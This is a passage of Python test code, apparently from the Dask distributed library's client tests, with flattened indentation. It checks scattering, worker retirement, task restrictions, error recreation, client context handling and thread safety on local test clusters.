async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
xxkey = xx.key
del xx
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster()
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert stringify(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster()
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s["address"]) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s["address"]) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@gen_cluster()
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=False):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=False):
total = delayed(sum)(L1)
with dask.annotate(workers=c.address, allow_other_workers=True):
L2 = [delayed(add)(i, total) for i in L1]
with dask.annotate(workers=b.address, allow_other_workers=True):
total2 = delayed(sum)(L2)
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate2(e, s, a, b, c):
def key_to_worker(key):
return a.address
L1 = [delayed(inc)(i) for i in range(4)]
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
with dask.annotate(workers=key_to_worker):
out = e.persist(L1, optimize_graph=False)
await wait(out)
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total, total2]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=True):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=True):
total = delayed(sum)(L1)
with dask.annotate(workers=[c.address]):
L2 = [delayed(add)(i, total) for i in L1]
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.compute(L1 + L2 + [total], optimize_graph=False)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
assert await c.gather(futures) == list(range(100))
# Don't count how many tasks landed on each worker.
# Normally, tasks would be distributed evenly over the surviving workers. However,
# here all workers share the same process memory, so you'll get an unintuitive
# distribution of tasks if for any reason one transfer takes longer than 2 seconds
# and as a consequence the Active Memory Manager ends up running for two iterations.
# This is something that will happen more frequently on low-powered CI machines.
# See test_active_memory_manager.py for tests that robustly verify the statistical
# distribution of tasks after worker retirement.
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
await s.extensions["stealing"].stop()
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
await s.extensions["stealing"].stop()
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
while len(S) < 4:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
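# normalize_collection replaces graph keys that are already persisted on the cluster
# with their Futures, so the resulting graph is smaller than the original.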
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2**20, chunks=2**10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
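# Scan the transition log for tasks that went from memory to released while being
# recommended back to waiting, which would mean completed results were lost and
# are being recomputed.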
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
"""`await Client(...)` keeps retrying for 10 seconds if it can't find the Scheduler
straight away
"""
with dask.config.set({"distributed.comm.timeouts.connect": "10s"}):
c = Client("127.0.0.1:57484", asynchronous=True)
client_start_fut = asyncio.ensure_future(c)
await asyncio.sleep(2)
async with Scheduler(port=57484, dashboard_address=":0"):
await client_start_fut
assert await c.run_on_scheduler(lambda: 123) == 123
await c.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
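# The recreate-error/recreate-task helpers fetch a remote task's function, args and
# kwargs so the failing (or finished) call can be replayed locally, e.g. in a debugger.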
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
error_f = await c._get_errored_future(df3)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
error_f = await c._get_errored_future(zz)
function, args, kwargs = await c._get_components_from_future(error_f)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_recreate_task_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(2)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)([x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: int(3628800 / (x + 1)))
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == [
3628800,
1814400,
1209600,
907200,
725760,
604800,
518400,
453600,
403200,
362880,
]
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
df2 = df.a.map(lambda x: x + 1)
f = c.compute(df2)
function, args, kwargs = await c._get_components_from_future(f)
expected = pd.DataFrame({"a": [1, 2, 3, 4, 5]})["a"]
assert function(*args, **kwargs).equals(expected)
# with persist
df3 = c.persist(df2)
# recreate_task_locally only works with futures
with pytest.raises(AttributeError):
function, args, kwargs = await c._get_components_from_future(df3)
f = c.compute(df3)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs).equals(expected)
@gen_cluster(client=True)
async def test_recreate_task_array(c, s, a, b):
da = pytest.importorskip("dask.array")
z = (da.zeros((10, 10), chunks=10) + 1).sum()
f = c.compute(z)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == 100
def test_recreate_task_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert c.recreate_task_locally(f) == 2
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
while a.status != Status.closed:
await asyncio.sleep(0.01)
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert distributed.foo == 123
finally:
del distributed.foo
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(
loop=loop,
processes=False,
dashboard_address=":0",
threads_per_worker=4,
) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
import distributed
client = get_client()
assert not client.asynchronous
assert client is distributed.tmp_client
future = client.submit(inc, x)
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=rf"^{msg}$"):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@gen_cluster(client=True)
async def test_secede_balances(c, s, a, b):
"""Ensure that tasks scheduled from a seceded thread can be scheduled
elsewhere"""
def f(x):
client = get_client()
secede()
futures = client.map(inc, range(10), pure=False)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(10), workers=[a.address])
results = await c.gather(futures)
# We dispatch 10 tasks and every task generates 11 more tasks
# 10 * 11 + 10
assert a.executed_count + b.executed_count == 120
assert a.executed_count >= 10
assert b.executed_count > 0
assert results == [sum(map(inc, range(10)))] * 10
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_long_running_not_in_occupancy(c, s, a):
# https://github.com/dask/distributed/issues/5332
from distributed import Lock
l = Lock()
await l.acquire()
def long_running(lock):
sleep(0.1)
secede()
lock.acquire()
f = c.submit(long_running, l)
while f.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.workers[a.address].occupancy == parse_timedelta(
dask.config.get("distributed.scheduler.unknown-task-duration")
)
while s.workers[a.address].occupancy:
await asyncio.sleep(0.01)
await a.heartbeat()
ts = s.tasks[f.key]
ws = s.workers[a.address]
s.set_duration_estimate(ts, ws)
assert s.workers[a.address].occupancy == 0
s.reevaluate_occupancy(0)
assert s.workers[a.address].occupancy == 0
await l.release()
await f
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def func():
client = get_client()
f = client.submit(slowinc, 1, delay=0.5, key="slowinc")
client.gather(f)
future = c.submit(func, key="f")
while len(s.tasks) != 2:
await asyncio.sleep(0.001)
# lower values schedule first
assert s.tasks["f"].priority > s.tasks["slowinc"].priority, (
s.tasks["f"].priority,
s.tasks["slowinc"].priority,
)
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
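# Recursive workload: f(x) returns 4 for x > 4, otherwise it secedes and returns
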